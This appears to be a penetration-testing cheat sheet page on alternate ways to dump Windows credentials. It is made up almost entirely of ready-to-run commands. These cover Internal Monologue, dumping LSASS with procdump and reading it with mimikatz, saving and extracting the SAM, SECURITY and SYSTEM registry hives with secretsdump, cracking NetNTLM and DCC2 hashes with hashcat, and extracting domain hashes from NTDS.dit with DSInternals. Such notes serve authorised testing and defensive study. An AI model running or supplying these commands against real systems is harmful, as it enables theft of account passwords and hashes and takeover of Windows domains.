Alternate Cred Dumps

Internal Monologue

Internal monologue is a way of dumping creds without touching LSASS.

Using Internal Monologue

1
execute-assembly /root/ADShare/NET4.6.2/InternalMonologue.exe [help]
Copied!

Cracking Returned Hashes

1
hashcat hashes.txt /usr/share/wordlists/rockyou.txt -m 5500 -force
Copied!

Procdump + Mimikatz

1
# Dump with sysinternal windows signed binary
2
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
3
​
4
# Move lsass.dmp offline and use mimikatz to open and dump passwords
5
mimikatz # sekurlsa::minidump /root/lsass.dmp
6
mimikatz # sekurlsa::logonpasswords
7
​
8
# Viewing dump with invoke-mimikatz
9
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\lsass.dmp" "sekurlsa::logonpasswords"'
Copied!

Reg SAM / Security / System

1
reg save hklm\system system
2
reg save hklm\security security
3
reg save hklm\sam sam
4
​
5
# Extract
6
python secretsdump.py -security security -system system -sam sam LOCAL
7
​
8
# Cracking MS-Cachev2 hashes recovered
9
Make the this format:
10
$DCC2$10240#username#hash
11
​
12
Crack:
13
hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable
Copied!

Offline DCSync

1
# For this you need the NTDS.dit file and the SYSTEM registry hive
2
# You will also need DSInternals PowerShell module. This can be moved across machines.
3
​
4
# Import DSInternals
5
import-module C:\Users\Administrator\Documents\DS\DSInternals\4.3\DSInternals.psd1
6
​
7
# Grab the bootkey from SYSTEM hive. This can be one offline or in a mounted DC VM.
8
$key = Get-BootKey -SystemHivePath D:\Windows\System32\config\SYSTEM
9
10
# Extract user information from NTDS.dit
11
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key
12
13
# Extract Hashes from NTDS.dit in a dcsync format
14
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File vault-hashes.txt -Encoding ASCII
15
​
16
# File can then be cracked, used as normal DCSync would.
Copied!
Last modified 1yr ago